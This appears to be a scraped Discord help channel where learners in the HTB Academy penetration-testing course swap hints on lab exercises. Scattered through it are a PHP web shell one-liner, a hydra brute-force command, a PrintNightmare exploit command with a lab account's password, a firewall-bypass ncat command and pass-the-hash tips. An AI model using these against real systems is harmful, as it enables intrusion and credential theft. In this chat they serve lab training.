Shells and Payloads _Live Engagement-Host 3: can someone throw me a hint.. I have || tried using a SMB exploit, no luck--locked out now..can do the webshell, but cant access the flag ||

raven cairn
#

like I've been stuck on this one section for such a long time 🤣

honest ridge
#

module:SHELLS & PAYLOADS
Sec: laudanum, One webshell to rule them all.

2nd question being "Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)"

I have the shell on server so thats all good. but when im trying to move directory's nothing is working. im just stuck in c:\windows\system32\inetsrv

any hints?

sly tapir
#

dont you just find the directory to the aspx web shell and be done

fathom pendant
honest ridge
sly tapir
#

its just a Q&A...for me I use kali so i had to use the Pwnbox terminal to find the directory of the shell because its different from kali

honest ridge
#

yeah. i use both tbh. for this im using pwnbox

#

just seems weird i have the shell on, can systeminfo and get reply. but cant navigate at all

#

im probably just being an idiot tbh....

sly tapir
#

iirc you dont need to use the shell...just find the directory on your pwnbox

#

i mean you do for question 1

fathom pendant
#

^

#

It's asking for the directory on your system not the upload

honest ridge
#

lol fml

vital adder
honest ridge
vital adder
#

oh shit

wheat garden
#

anyone can help with Active Directory Enumeration & Attacks

Skills Assessment Part I

final question - Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01. not sure how to go about doing this dsync I have tpe..... credentials.

dim cosmos
#

hi all

vital adder
bitter vine
#

Yo ppl

#

iam Newbie Here

wheat garden
stable phoenix
#

Hi , I m new here. I'm kind of confused on how to get guidance for each machine ? I have no idea what to look for each one .. Isn't there some kind of tuto or steps ?

vital adder
#

@bitter vine @stable phoenix give both of these video a check if you guys are new to hacking
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2023-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:41 - Intigriti Sponsorship
2:01 - Important Notes
4:12 - Building a Foundation
5:14 - Basic IT Skills
8:22 - Networking Skills
12:35 - Linux Skills
15:07 ...

▶ Play video
vital adder
fathom pendant
vital adder
fathom pendant
vital adder
#

yep the whole point of this section is you can connect from the first host to the third host using the second host as a proxy

#

so kinda dumb

fathom pendant
#

ohey it worked :^)

#

The only thing I majorly disliked about this is that you used the SAME hosts

#

which made some things trivial since you could kinda work around some of the things by using other methods

fathom pendant
#

ugh I don't feel like fighting things tonight to do the skills assessment LOL i think I'll pick it back up in the morning

wheat garden
vital adder
#

Yep and hint you have to run mimikatz as the right user

wheat garden
wheat garden
#

damn gonna haft to continue this tomorrw

rustic sage
#

i tried to start a modules and its having me sign in to my htb account but when in enter my email it says it doesn't recognize it

glossy perch
#

Hi, can someone give me some guidance in the Firewall and IDS/IPS Evasion-Hard Lab? I've tried to use "--source-port 53" to get passed the firewall to get to port 50000. Once I did that I used Ncat to try and grab the banner but it keeps returning "permission denied" am using the wrong port's or am I on the right track?

faint rampart
glossy perch
faint rampart
# glossy perch thanks for the guidance, I am getting a connection using "nc -nv --source-port 5...

No its not correct
Here you are grabbing the banner of the HTTP service which I cant even recall was running
The aim is to grab the banner of the service running behind the port 5000 so ||ncat -nv --source-port 53 $IP 5000|| Trusted in the sense that the service going to show as filtered(behind a firewall), you would need to sorta DNS proxy with the source port of a DNS server (which the server would think is the internal DNS server) and allow you port scan or banner grab that very filtered service. Please correct me if I am wrong lol

glossy perch
#

I've read online people have had success on their own parrot systems so I will try that

faint rampart
vital adder
fathom pendant
plain coral
plucky bobcat
#

Try adding any of the injection operators after the ip in IP field. What did the error message say (in English)?

I have no error message

#

oh ok i just found it i was supposed to use the input of the website

pearl crest
#

Solutions disappeared for anyone else? (Enterprise academy - Penetration Tester job role path)

autumn pilot
#

reach out to support

pearl crest
#

yeah have done and waiting on a response. Just wondered if it was system wide

autumn pilot
#

why do you feel that you need a tgs to continue?

#

this is not the only thing that you can do

arctic acorn
#

Not very helpful, but I'm stuck at exactly the same exercise. I would also appreciate a nudge in the right direction.

autumn pilot
#

you are on the right track to be honest, however, do not over complicate the things when it is not necessary

vital adder
#

basically the hint is more enum, i recommended bloodhound also even with spoiler tag that's literally the answer for one of the question (the username) so can you just remove that?

karmic mantle
#

What rights does generic all give you for groups?

coarse cypress
#

Hey everyone. Having an issue with one of the Academy exercises. HTTP Fundamentals -> HTTP Requests and Responses -> Question 2 at the bottom of the page. I've got the version number, but it's not accepting it.
Anyone else having this issue?
I pulled the same version via Firefox as well as via curl -v.

autumn pilot
#

let's not discuss an assessment

autumn pilot
coarse cypress
#

That's the thing though, I'm using the version number that's displayed. Won't say it here obviously.

autumn pilot
#

its a tier 0 module, so go ahead

coarse cypress
#

Sent you a PM

devout torrent
#

Hey there, I am currently on ATTACKING COMMON SERVIC, name Attacking DNS, for somereason I cannot find anything related with inlanefreight.htb , I added all the ip and name to etc/hosts, but any dig attemps just come back as empty

#

am i suppose to do anything extra condering the domain is on the p53

#

What obvious thing am i missing 😄

low echo
#

Has anyone done the skills assessments on Introduction to Deserialization Attacks?

dusty timber
#

I need help with Zap fuzzer in web proxies.
I manage to get the usernames as md5 hash but I dont know how to turn them into the flag

floral sandal
#

who finished Active Directory - Skills Assessment II ?

#

Active directory attacks module

summer flame
#

Hi all, I am stuck in Credential Hunting in Linux section. I got the ssh login for kira. But after I am lost on how to get will password. Any hints? L) Can the notes.zip be crack? Thank you~

vital adder
vital adder
vital adder
vital adder
dusty timber
#

I manage to get the usernames into md5 hash, then I edit the cookie and send but I cant get it to work

vital adder
#

yeah my note for this is in zap is a mess but burp is so much better for this

dusty timber
#

I dont like this at all, and the descriptions what to do in the "academy" is terrible

#

can you point me in the direction in burp then

vital adder
#

in burp intruder "Add" the cookie and in the Payloads tab, go to Payload Processing section and click "Add" and choose Hash > MD5

dim wolf
#

from the getting started module?

dusty timber
#

I just get a first line with "baseline request" and then nothing more

autumn pilot
#

so there is a chance of you doing something wrong

dusty timber
#

I'm pretty sure I'm doing something wrong, I just dont know what :p

#

Its not even supposed to be that hard. I mentioned up steps above, what could be wrong?

autumn pilot
#

you are sure that you have selected the cookie that you need to brute force and you have selected the appropriate processor

dusty timber
#

I did get a second request up now with another cookie

#

I had snipe selected

floral sandal
autumn pilot
#

capture the request with a cookie, brute force the cookie using the wordlist while using the processor and you get the flag

dusty timber
dim wolf
#

if you check the congrats page of the module there's a list of boxes

fathom pendant
#

The list of boxes though is generally retired boxes

autumn pilot
#

take a 2-3 minute break, start from scratch and you will get it

#

do something funny for span of the break

#

or watch something funny

vital adder
vital adder
floral sandal
#

its part 2

#

"Use a common method to obtain weak credentials for another user"

vital adder
#

my note said there is let me give that a cred

vital adder
floral sandal
#

its the actual question

vital adder
#

so there is "weak credentials" and hint the cred was showed in previous section

vital adder
dusty timber
#

yes

#

Then got the results and added in decoders

vital adder
#

yep just give it a test run and it's worked just fine for me

#

so when you run it nothing change for the length for all request?

autumn pilot
#

let's not forget that this isn't a tier 0 module

vital adder
#

oh spoiler?

autumn pilot
#

everything and even a bit beyond to solve the exercise is either here and especially in the section of the module

dusty timber
#

Im running another attack and I see nothing

#

im running it towards ip:port/skills/

#

Like it says

autumn pilot
#

i mean you are literally pasting out the solution

vital adder
autumn pilot
#

even the solution to be in the section of the module

#

still, they need to practice rather than to rely on someone else to give them the exact instructions

dusty timber
#

yes I know the solution but im doing something wrong along the way

#

and ive been at this for 4 hours now so its just a waste of time for everyone at this point

autumn pilot
#

as I told you, take a break, it tends to help

#

it is not a hard exercise, just be calm and take your time to explain each and every step to you first

#

then try to compare it in the section with the examples and see where you might have been doing something wrong

#

also, do not forget learning from mistakes (big or small ones) helps you tremendeously

rustic sage
#

Hi

hexed anvil
#

Has anyone completed the blind sqli module? I’m absolutely stuck on the final assessment. Any one I can chat with?

sinful mulch
#

so when the instructions give you information, but don't tell you where the information comes from...was i supposed to find that part on my own within the previous steps?

shadow canopy
#

hey guys im doing AD Enumeration & Attacks - Skills Assessment Part II
got stuck on Q7.Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host
i managed to login to sql
when i try to transfer files but doesn't write to disk.
i also tried to impersonate sql users like the mssql section but couldn't get to read Administrator desktop files

autumn pilot
#

remove some of the spoilers ^, make sure that the file is written to disk correctly and what else you can do with that file

tight mesa
#

I'm stuck on the module login brute forcing - login form attacks. I ran the command "hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 139.59.167.73 -s 30966 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"" and got back the login credentials (removed), but the page still isn't letting me login. Is that not the correct login credentials?

autumn pilot
#

seems correct to me, but please remove the credentials, also feel free to issue a reset on the target

tight mesa
#

I just reset my terminal and now the command isn't running and when I try to go to the webpage, it says connection timed out

autumn pilot
#

if you have issued a reset on the target, then there will be a new IP

frigid monolith
#

Is it normal for the sqlmap labs to be so slow?

autumn pilot
#

depends on the type of an attack you are doing and the parameters that you have specified

frigid monolith
#

It keeps complaining about the connection timing out

hardy hare
frigid monolith
#

Thanks I'll try that next

severe topaz
#

Question about Password Attacks Lab - Hard.
Should I start by brute forcing winrm with johanna or start somewhere else?

sick warren
#

in Active directory Miscellaneous Misconfigurations part .. printNightmare exploit code on the machine gives me The network path was not found. and I don't actually find entries in the logs of any trying to access that path
The command i sendis -> sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\10.129.126.194\CompData\backupscript.dll'

#

When I tried to access the smb myself I was able to view that backupscript
I logged in using smbclient

#

Okay i managed to do it. There's no path between these two subnets. I guess

waxen kayak
#

OK...... I maybe have gone insane.
Has anyone else performed XYZ test on a box in the modules, where the test initially fails.... but after 30 minutes of head smashing try the test again and it works?

waxen kayak
#

Glad I am not the only one... this makes me half way believe I am not doing anything right half the time.

west canopy
dusty timber
#

200k members passed now lol

#

Hopefully academy giveaway coming up 🥳 🤭

dusty timber
#

Nice catch @acoustic owl lol

raven cairn
#

Also there have been a lot of advanced web attack modules released recently which leads me to believe a new skill path? 🤨

odd dawn
#

Duddereeeee

#

I need reversing stuff 🥺

odd dawn
raven cairn
#

Also more red team stuff please

#

I want a car pentesting module but that would be kinda hard to do

sly reef
#

UPLOAD ATTACKS FINAL ASSESMENTS:
I'm searching a test file cause im getting 404 with everything and can't find it aswell: ||/contact/user_feedback_submissions/230215_test.jpeg||

#

any help please

raven cairn
#

I theorize possibly more blue team stuff cuz HTBs main competitor is THM and THM is currently doing better in the blue team area

snow needle
placid quest
#

@sly reef what is the problem

#

@sly reef you did not upload the shell

sly reef
#

no

#

it is a test

#

an image

#

which i should be able to see

dim wolf
#

where are you geographically

sly reef
#

spain

#

oh

#

server time

#

fml

#

Date: Wed, 15 Feb 2023 18:59:09 GMT

#

shouldnt this be 230215 anyway

placid quest
#

@sly reef dm

acoustic owl
woven copper
#

hi someone could help with Bloodhound Module, the zip files contain json files that can not be Open on Bloodhound even pwnbox Bloodhound !! , Amaizing how outdated that module is. Anyone with knows on what versión works ?

thorn urchin
#

bloodhound is pretty notoriously picky about version differences with its ingestors

#

either gotta use an older version of bloodhound with something like docker or run new ingestor again(if lab has the targets)

sly reef
#

shell & payloads

finite peak
#

Ok, I feel pretty stupid because I've been learning Linux basics for a couple of weeks now but I'm totally stuck in the first part of Linux Fundamentals/System Information/"What is the path to the htb-student's mail?". For sure it's super easy and obvious but I can't find the way. I've even tried searching around in other pages and none of the options worked. Help please!

west canopy
fathom pendant
iron basin
#

Are there any modules that teach you powershell well?

shell marsh
#

hey , need some help in Firewall and IDS/IPS Evasion - Medium Lab , we have to enumerate dns server version , I got the version but it's not accepting , any help would be appreciated

#

module is related to job-role path

minor moth
#

Hello, I am working on "ACTIVE DIRECTORY BLOODHOUND" and I am having a problem importing a .zip file into BloodHound.

#

I constantly receive the message "BAD JSON FILE" when importing the BloodHound data and have not been able to fix it by running the 2020 version. Is there a way to fix this issue?

iron basin
#

@shell marsh I went to look back to see what the answer was to the question since i complete the module. The answer states submit the dns version number as the answer, however the submitted answer that I have is a flag lol...

shell marsh
#

please check and let me know if I am heading towards right direction

knotty blade
#

help please on xss, phishing, combing, html and xss?? any pointers?

#

Online Image Viewer

Please login to continue
;document.getElementById('urlform').remove();

knotty blade
#

xss

#

phishing section trying to build the script but vasnt get the doc write id part

knotty blade
#

right there with ya bro, i ussed xssstrike to get the payload just cant get id part to work

#

how are u friend? did u solve this part as im stuck here same issues? thanks

#

hello friend, im in the same spot any pointers? i cant remove the get elemnt part which shows on the page?

#

hello im in the same boat but the bormoval part. to get rid of documnet change the single quote to outside....."Login"></form>)'

balmy radish
#

Madfox looks like he’s trying to help you out so you don’t need to keep pinging people

knotty blade
flat oxide
#

Can I dm you about this?

knotty blade
#

sure much apreciated

hallow remnant
#

Stuck on "Password Attacks" > "Protected Files"

I was hoping Kira's credentials were the same as the earlier cracking exercises, but that appears to not be the case. Any nudges on mutation schemas?

balmy radish
knotty blade
west canopy
rustic sage
#

How is everyone doing ? Recently started HTB

queen hatch
#

I'm on Hacking WordPress - Skills Assessment. I have every question answered execpt for Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

Any nudge in the right direction would be appreciated. I've saved the wpscan results but I feel like I'm missing something

acoustic owl
iron basin
#

Linux Local Privilege Escalation - Skills Assessment: I have gotten flags 1-3, gotten barry's creds and been looking through the logs file for anything of use. For flag4, I am told to look at external services. The two that I see are the apache webserver on port 80 and the tomcat one on 8080. I am assuming I need a way to exploit some vulnerability in these web services?

queen hatch
west canopy
modest isle
coarse cypress
#

If you just started the HTTP section, I ran into the same problem. Didn't spawn the VM first. lol

#

Mine was trying to redirect to a new version

hardy socket
#

Hey guys and gals, I'm having some trouble with Footprinting module, the IMAP/POP3 section. Is there anybody that can help me understand the ways to solve the last two questions, and especially how does one use imaps (it's driving me insane!)?

woeful ermine
#

whats the problem?

#

you need to check other resources for that section by the way

hardy socket
# woeful ermine whats the problem?

finally got help from one of the admins. The imap syntax is a bit crazy. Any advice on how to learn more about using it? and which resources do you mean?

iron basin
#

@west canopy aw, I see I didn't try the || default creds route enough ||

balmy radish
#

I used Google to find a site with the IMAP information I needed

west canopy
swift warren
#

Is there any way to contact HTB Academy staff about a billing issue? I've been scouring the site for a way to create a help ticket or something similar and I cannot find it

uncut sequoia
#

Turn off adblocker if on

#

Then there should be a chat bubble on the bottom right

swift warren
#

Awesome, I appreciate you

honest ridge
#

Mod: shells and payloads
sec: Live engagement
second question
so it tells you password for login - then find the upload -tried using wwwolf-php-webshell from previous module. with changing content type to war file. = not working
any pointers?

hollow turret
#

Hello

woeful ermine
#

if I am not mistaken you should upload war file to apache tomcat without any issue

honest ridge
vital adder
ivory hollow
#

Hi all

i am stuck in footprints easy section as i used the wget command to get the files but the files are not downloading it always shows try to connect. same this happened for a week.
Please help me.

Thanks

vital adder
vital adder
#

and use the get command to download file

ivory hollow
#

i also use this way... but still can find the flag in ids-rsa..

#

and any other files as well..

#

or am i doing something wrong?

vital adder
#

so you think the skill assessment is just login and get the flag?

woeful ermine
vital adder
ivory hollow
#

yes i got the ssh key.

ripe grove
#

keys usually open things

hollow turret
#

What’s the key

dim wolf
#

the key is braindamage

hollow turret
#

Lol

low vine
#

File Upload - Whitelist Filters

  1. I am following along with the instructions and it shows us that with double extensions we use a certain wordlist and are asked as an exercise to fuzz the upload form and see whats whitelisted by the upload form. I've used the exact list several times and I'm not understanding why I'm not seeing anything that is whitelisted by the upload form (I assume its supposed to show some).

  2. After this little exercise it asks us to intercept a normal upload request and modify the file name to shell.jpg.php and insert the contents to <?php system($_REQUEST['cmd']); ?>

Trying to understand where I might be misapplying what its asking to me to do.

#

Tryinjg to get some understanding on what I might not be understanding or doing correctly with the scenario as I've gone through it a couple of times and its throwing me for a loop even though I'm just copy / pasting along with the steps

wheat garden
#

Hey need a nudge on Active Directory Enumeration & Attacks skill assessment 1

on the final question.

Think im very close but not sure how to connect to DC01 computer I have the administrators NTLM hash. Have not been able to successfully crack the hash though im guessing I need to do some kind of pass the hash. Been trying to do all this from the MS01 RDP window. Trying to pass the hash with mimikatz to dc01 proven unsuccesfull for me so far.

vital adder
wheat garden
vital adder
low vine
#

So I'm not actually even doing the "question" for it. Just following along with whats shown.

vital adder
#

and hint the section does give you a script to make the wordlist and you can just use that but change or add more or different extension to that script

low vine
#

I'm just walking myself through for understanding and just following along / taking notes through whats shown

#

etc etc

vital adder
low vine
#

Screenshot under "Dobuble extensions"

#

Is where i'm at

vital adder
#

hint not all example showed is the actual target

low vine
#

Oh ><

#

I was gonna waste a ton of time t y for the info

#

I understand the idea

vital adder
#

so for this it's a form of Dobuble extensions but not 100% exactly like the example show

wheat garden
vital adder
#

np and i guess mimikatz should work because this is just a simple pass the hash to get RCE

#

but for this you can also use get meterpreter shell on MS01 and use ||autoroute + socks server|| and after that use ||proxychains4 + evil winrm|| to get RCE on DC01

low vine
#

ty for the clarification

wheat garden
#

will add that to my notes

vital adder
#

some how i didn't even touch chisel in offshore 🤣

dim cosmos
#

hi everyone 🙂

low vine
#

@vital adder are you here by chance just got back and having slight understanding / problem on same section

#

I've got the file upload succeeding and am not able to get the requests

#

so I should be able to just ?cmd=xxx but its 404ing

vital adder
vital adder
low vine
#

so it gets the php code back but not execution

vital adder
#

of course

#

if you upload it using an extension that can't run php code like an image extension it will just display the image in this case the payload

low vine
#

Facepalm.jpg thats the smack inthe face I needed

#

Aight I got this from here hopefully

brisk geode
#

hey can anyone give me a nudge on Skills Assessment - File Inclusion?

i get two types of response sizes while fuzzing the parameter but dont know which one is the correct one am i on the right track? just for the sanity check

primal silo
#

i need help with sqlmap skill assessment

woeful ermine
cloud skiff
#

how to navigate between panes in tmux?
I tried Ctrl+B followed by the Up arrow to move to the top pane but it's not working.

dusty timber
#

@vital adder are you not sleeping? Everytime I look in here you are helping someone 😅

vital adder
#

i don't (i'm a hacker 🤣 )

vital adder
vital adder
vital adder
brisk geode
#

he should be a staff ong

dusty timber
vital adder
#

yeah.... i did get the offered but it's been over a month without any update

dusty timber
#

Well wasnt it this month everything happened? Money in the bank account, new stuff on the website, might have slipped through. Ask for an update :p

vital adder
#

of course but i still got a lot of plant right now and i may can't take the offered unfortunately 😢 but of course i will ask for some info at least after offshore

#

i got 3 machine left

low vine
#

Always doing the lords work mrtom

#

Helping us scrubs inch along

vital adder
#

also mrb3n make that lab (offshore) so i may write a long ass "pentest report" and send him that

cedar imp
#

Hello everyone,
For the Introduction to Web Applications module, Section 2 (Web Application Layout).
Can anyone give me a clear difference between Client-Server Infrastructure and One Server Infrastructure?

low vine
#

Reading through these modules makes me feel incredibly stupid

#

I understand pretty well most of what i'm going through...but when I read it I just like fail to understand what its wanting / asking half the time.

vital adder
#

oh yeah i guess both of them are kinda the same

cedar imp
ivory hollow
#

Hi all

i am stuck in footprinting easy lab.
as i downloaded all the files one by one and i checked each file. but i couldn't find any flag. Any hints please.
i thinks its in id_rsa file but no luck.
please help me

Thanks

vital adder
#

again this is an skill assessment you can't just download file from the ftp and get the flag and again the id_rsa is an ssh key use the key to login via ssh

ivory hollow
#

okay i try . thanks for your hint.

ivory hollow
#

@vital adder when i tried with key.. it says permission denied.

#

do we need to provide any other command

#

i am using ssh -i private key user@ip

vital adder
ivory hollow
#

no ..

#

its same as it is.

vital adder
#

change it to 600

ivory hollow
#

i tried each 48 keys.

#

yes i did that..

#

chmod 600

#

i did that.

vital adder
#

why and where did you get 48 keys?

ivory hollow
#

id_rsa contains 48 keys.

#

even i tried id_rsa.pub

#

it doesn't work.

#

let me try again to id_rsa

#

i think i am doing something wrong..

#

@vital adder its not working even i selected all as one key. and use it.

vital adder
#

so what exactly did you do?

#

id_rsa is a key file with contain 1 key

#

and id_rsa.pub is the public key which you can't use to login

#

just use chmod 600 id_rsa and ssh -i id_rsa (username)@(your target ip)

ivory hollow
#

just a sec then

#

i open the file copy the key from id_rsa and then using it.

modest isle
vital adder
modest isle
#

File Contents module

vital adder
#

there are no module with that name

#

is that the section name?

vital adder
modest isle
#

Sorry, section!

#

Linux Fundamentals module

#

I've answered the 1st and 2nd question buh the 3rd one seems a big blow

#

After using curl, it doesn't give me the full source code of the inlanefreight website

vital adder
#

for that one i have to use 11 tag and i think half of them isn't even showed in that section

#

i think for this the intended way is to use google

ivory hollow
#

i logged in... @vital adder

#

hope so find the flag now.

modest isle
vital adder
#

also how do you know you didn't get the full source code?

modest isle
#

Visiting the site via Firefox on the pwnbox, the information on the site was more verbose that what's returned with curl on the terminal

ivory hollow
#

its the same files which i already explored. is the flag in these files @vital adder

vital adder
modest isle
vital adder
#

-v in curl i think is for verbose and nothing to do with the source code

#

and so in firefox you use ctrl + U to read the source code and see that's it's much longer than curl

modest isle
vital adder
vital adder
modest isle
vital adder
#

also you can view it in the networking tab

vital adder
modest isle
vital adder
#

so from my kali curl give me 315 line and firefox give me 316 so i guess you are right

ivory hollow
#

i think so its hard for.me... but i am keep trying. @vital adder

vital adder
modest isle
ivory hollow
#

yes agreed @vital adder

vital adder
#

sorry for the delay guys

vital adder
vital adder
# ivory hollow yes agreed <@742342637532479518>

if you are new to i suggest you go back to the basic and first learn linux (clearly you don't know how ssh key work) and learn some basic enum and hacking with hand holding like on tryhackme

#

even the htb academy i would say isn't for every 100% beginner

ivory hollow
#

i think so you are right @vital adder .

but i still tied this on parellelly

modest isle
#

Hacking is just fun

#

You know, getting to figure out stuffs and understandning how shit works is just incredible.

vital adder
#

but there is a linux fundamentals modules (like the academy) and is also free like the one from the academy so if you are new to linux i would recommend you give moth that and this module a check https://tryhackme.com/module/linux-fundamentals (this modules have 3 room and all free)

#

i think before there is 2 vip one but they also remove that for some reason

vital adder
# modest isle Hacking is just fun

not if it's getting frustrated because you don't understand anything that is happening, i been there before thing just isn't run any more

modest isle
#

I feel so sorry for you

vital adder
#

the worst thing when you got the basic in and going to the next level it's will kick you in the nut

modest isle
#

Buh to me, that's when things get even more exciting to do cos I actually do like challenges a lot!

vital adder
#

not when the AV is on 🤣

modest isle
#

lol

#

You shouldn't be friends with AV's

sharp temple
#

Hi, I have a general question about active directory and DC compromise, who would by kind and PM chat for a while with me?

modest isle
#

the h1 header from the curl command is still showing "301 Moved permanently". Don''t know what to do at this point

#

Can anyone help?

ivory hollow
#

Yes you are right mate. thanks for your very kind assistance. @vital adder

turbid lily
graceful mortar
#

hi guys, i'm stuck in this question on this module: passwords attack: pass the hack.
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

#

I got already all the hashes but i cannot get access do DC01

#

Someone could help me?

loud sapphire
#

did anyone every successfully get oracle instant client installed or thc-hydra?

I cant get it working

sacred ermine
#

password - hard lab, guys no jokes, I really dont know what to do, i found johanna's password and found there .kdbx file what can i do with it i cannot crack it, any help?

sacred ermine
sacred ermine
graceful mortar
zenith gazelle
#

Hey guys, just for curiosity, in the Footprinting module, the easy lab the hint is just extra or you need the info to be able to complete?

devout torrent
#

Anybody able to give me a hint what password list to use with Attacking Common Services - Easy

sacred ermine
sacred ermine
spare condor
#

Module Attacking Common Applications, Attacking Tomcat section: I brute forced with the Metasploit module, with the python script and with different lists too. Didn't find credentials. Can anyone help me with this?

gray blade
#

Hello! Someone could help me on skills assessment on pivoting, tunneling and port forwarding? I can xfreerdp with thé first user mle*** but i cant with vf****

mild lodge
#

Hello, anyone can help me with the module AD Enumeration & Attacks - Skills Assessment Part II?
I am stuck on the question: Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

Nevermind fixed it, for anyone stuck here, use the DomainPasswordSpray learned from the module 🙂

#

Did you run it as root?

dusty timber
#

Hey @livid bluff how do you make those code window things in the chat?

sacred ermine
#

guys nbdy that can help?

pine dagger
autumn pilot
#

You asked to find the apache version, not to fuzz a subdomain

#

make sure to add those vHosts (domains/subdomains) to your hosts file in order for you to be able to resolve them, e.g. to be able to open them in your browser

spare condor
#

@sweet heron Can I DM you regarding this one? I have the same problem

regal compass
#

Hi cqn anyone tell me which laptop is best to start learn hacking??

lethal atlas
acoustic owl
# regal compass Hi cqn anyone tell me which laptop is best to start learn hacking??

Get Proton VPN for free: https://go.getproton.me/SHWN or get Proton Mail here: https://go.getproton.me/SHWO

OTW and I get asked this question all the time: "What's the best laptop to buy for hacking?" In this video we answer that question and more.

// Menu //
00:00 - Coming up
00:32 - Intro
00:38 - Sponsored Segment
01:41 - "The perfect laptop...

▶ Play video
thorny wadi
#

need a nudge on Pivoting, Tunneling, and Port Forwarding Skill Assessment

waxen barn
#

One thing I've noticed: Be leery of the modules where the exercises at the end of each page are easy. That means the Skills Assessment is gonna wreck your world.

waxen barn
thorny wadi
#

ty anyway

waxen barn
#

No problem!

iron basin
#

@west canopy Regarding the flag4.txt issue, realized its not default creds after searching through the system...

sacred ermine
west canopy
iron basin
pine dagger
autumn pilot
#

If its linux you can use SCP

#

or even open a port using http.server module in python3

vital adder
finite peak
lethal atlas
#

Just a note for anyone on the Windows Privilege Escalation module. In the section "SeImpersonate and SeAssignPrimaryToken" the content makes you believe you need to upload the files required to the windows server. This is not the case. The files already exist in the C:\tools folder. Dont waste time trying to upload lol

deft escarp
#

im struggling with the last two flags on the smb section of the footprinting module

lethal atlas
#

what quetions?

deft escarp
#

" Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer." I have looked through every file and ran the commands talked about in the module, I have no idea what a customized version of a share even is.

the second problem is that I can seem to find the full system path to the specific share. the missing piece is the user. i've googled a lot and used chatgpt but cant figure it out

lethal atlas
#

have you tried rpcclient?

deft escarp
#

yeah

lethal atlas
#

dm me

deft escarp
#

kk

crimson spoke
#

If I want to change the root password of a centOS box I have local access to do I have to use a centOS live cd to mount and use the passwd command on?

lethal atlas
#

no but you will need the current root password

crimson spoke
#

That's the problem 🥲

iron basin
#

Linux Local Privilege Escalation - Skills Assessment: I am working on flag4, || and was able to login to the tomcat manager panel and bypass the need for accessing the page off the same machine hosting the server by port forwarding. I used msfvenom to craft a payload and uploaded the shell. However, when I try to go to the directory where the shell is located at on the webserver it says access forbidden weirdly... any help? Thought I should be able to access it since I have the creds. ||

crimson spoke
#

Current psw is lost